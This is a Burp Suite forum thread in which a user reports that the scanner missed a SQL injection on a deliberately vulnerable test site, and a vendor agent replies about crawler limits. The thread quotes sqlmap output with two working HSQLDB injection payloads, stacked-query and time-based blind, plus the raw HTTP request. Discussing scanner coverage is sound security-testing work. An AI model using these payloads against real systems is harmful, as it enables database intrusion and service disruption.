Burp Suite User Forum

Missed SQL Injection

Nicolas | Last updated: Oct 08, 2019 11:12AM UTC

Hi, Doing some tests I notice that Burp ( version 2.1.04 ) is missing the SQL injection at http://zero.webappsecurity.com under post data field payeeId. SQLmap will identify it with as the following: sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests: --- Parameter: payeeId (POST) Type: stacked queries Title: HSQLDB >= 1.7.2 stacked queries (heavy query - comment) Payload: payeeId=abc';CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(7251),0),500000000),NULL)-- Type: time-based blind Title: HSQLDB > 2.0 OR time-based blind (heavy query) Payload: payeeId=abc' OR CHAR(76)||CHAR(86)||CHAR(107)||CHAR(117)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)-- GsOo --- [14:02:48] [INFO] the back-end DBMS is HSQLDB ---- The post request where Burl should have found the injection is POST /bank/pay-bills-get-payee-details.html HTTP/1.1 Host: zero.webappsecurity.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 13 Connection: close Referer: http://zero.webappsecurity.com/bank/pay-bills.html Cookie: JSESSIONID=29DB5859; username=username; password=password payeeId=abc The website is created for testing web scanner applications, please feel free to use it for that purpose.

Burp User | Last updated: Oct 08, 2019 11:44AM UTC

Same case, forcing an audit on the specific URL/bank/pay-bills-get-payee-details.html brought up the SQL injection as valid Issue.

Liam, PortSwigger Agent | Last updated: Oct 08, 2019 02:16PM UTC

Thanks for this report Nicolas. Burp Crawler doesn't currently handle JavaScript-heavy apps. We have this feature in this years roadmap. Once we release the updated version of the crawler we should find this issue with a crawl and audit. If I can be of any further assistance, please let me know.

You need to Log in to post a reply. Or register here, for free.